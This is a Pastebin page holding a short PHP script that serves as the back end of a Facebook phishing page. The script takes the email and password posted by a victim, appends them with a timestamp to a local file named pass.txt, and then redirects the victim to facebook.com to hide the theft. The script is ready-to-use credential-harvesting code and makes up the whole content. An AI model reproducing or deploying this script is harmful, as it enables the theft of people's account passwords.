Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $email=$_POST['email'];
- $pass=$_POST['pass'];
- $time=time();
- $gmt='+7';
- $jm='3600';
- $var=$time+($gmt*$jm);
- $now=gmdate('d M Y - H:i',$var);
- $file=fopen('pass.txt',a);
- $save=fwrite($file,'|#|'.$email.'|'.$pass.'|'.$now.'');
- fclose($file);
- header('location:http://facebook.com');
- ?>
Advertisement
Add Comment
Please, Sign In to add comment